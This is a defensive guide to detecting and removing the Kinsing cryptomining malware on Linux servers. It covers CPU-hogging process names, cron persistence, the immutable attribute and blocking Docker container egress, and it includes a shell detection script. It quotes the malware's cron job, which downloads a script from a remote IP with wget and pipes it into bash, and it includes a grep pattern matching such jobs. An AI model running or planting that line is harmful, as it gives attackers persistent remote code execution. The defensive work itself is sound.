Fighting the Kinsing miner on infected Linux servers

Kinsing is malware written in Golang that runs as an agent on the compromised server. Its main purpose is to mine cryptocurrency on that server. It spreads by exploiting misconfigurations in services that are reachable from the outside.

The malware can add jobs to the cron task scheduler so that it can re-establish itself, for example after a server reboot.

How do you determine whether your server is being used for mining by the Kinsing malware?

Identify the processes that are consuming CPU resources with the top or htop task manager. You will see processes such as kdevtmpfsi, kinsing or dbused taking up most of the processor resources.

You cannot get rid of the processes simply by sending them the KILL signal, because they will be restarted over time.

You can try to find the jobs in the per-user cron spool:

ls /var/spool/cron/

For example, for the user confluence a job was found that downloads a script from a remote host with wget and pipes it into bash:

* * * * * wget -q -O - http://1.2.3.4/cf.sh | bash > /dev/null 2>&1
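As an added example (not code from the original post), the following POSIX shell script automates the two checks described above: it looks for the miner process names in ps output and for cron jobs that download a script and pipe it straight into a shell. The sample ps output and crontab are constructed; on a live host you would feed it the output of ps -eo pid,comm and the files under /var/spool/cron/.

```shell
#!/bin/sh
# Added example (not from the original post): detection helpers for the two
# Kinsing indicators described above. The sample inputs below are constructed,
# not captured from a real host.

# Process names the post associates with Kinsing.
KINSING_NAMES='kdevtmpfsi|kinsing|dbused'

# Input: "ps -eo pid,comm" style output on stdin (header line first).
# Output: lines whose command name is one of the Kinsing names.
# Exit status 0 if at least one was found, 1 otherwise.
find_miner_processes() {
    awk -v pat="^(${KINSING_NAMES})\$" \
        'NR > 1 && $2 ~ pat { print; found = 1 } END { exit !found }'
}

# Input: crontab text on stdin. Output: non-comment jobs that fetch something
# with wget or curl and pipe it straight into sh or bash, like the confluence
# job above. Exit status 0 if any such job exists.
find_pipe_to_shell_jobs() {
    grep -Ev '^[[:space:]]*(#|$)' |
        grep -E '(^|[[:space:]])(wget|curl)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)'
}

# Wrappers that take the text as an argument and print the number of hits.
count_miner_processes() {
    printf '%s\n' "$1" | find_miner_processes | wc -l | tr -d ' '
}
count_pipe_to_shell_jobs() {
    printf '%s\n' "$1" | find_pipe_to_shell_jobs | wc -l | tr -d ' '
}

# Constructed sample data for a stand-alone run.
SAMPLE_PS='  PID COMMAND
    1 systemd
  842 sshd
 1337 kdevtmpfsi
 1340 kinsing
 2001 bash'
SAMPLE_CRON='# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh > /dev/null 2>&1
* * * * * wget -q -O - http://1.2.3.4/cf.sh | bash > /dev/null 2>&1'

# On a live host replace the samples with the output of "ps -eo pid,comm"
# and the contents of /var/spool/cron/* (the latter requires root).
echo "miner processes found: $(count_miner_processes "$SAMPLE_PS")"
echo "suspicious cron jobs:  $(count_pipe_to_shell_jobs "$SAMPLE_CRON")"
```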

To stop the user from using the scheduler, we can disable the crond service or set the immutable attribute on the file. (Immutable means that the file is protected from changes: it cannot be deleted or renamed, no hard link can be created to it, and no data can be written to it.)

echo > /var/spool/cron/confluence && chattr +i /var/spool/cron/confluence

It is also worth checking the files that set user environment variables for unwanted scripts and, where possible, removing them and adding the immutable attribute there too.

Another approach is to block outgoing traffic, for example when the malware runs in Docker containers.
It is harder to find the malware process inside a container, but we can determine what the container is connecting to with the iptstate utility on the Docker host.

Search for container ID:

docker ps

Search for container IP:

docker inspect CONTAINER_ID | grep -i ip

Look at the connections from the container's IP address:

iptstate -s CONTAINER_IP

Block the container's outgoing HTTP requests:

iptables -A DOCKER-USER -s 172.18.0.7/32 -p tcp -m tcp --dport 80 -j DROP

All of the above is only a temporary measure to limit the miner's activity. Keep your software up to date and devote time to information security.
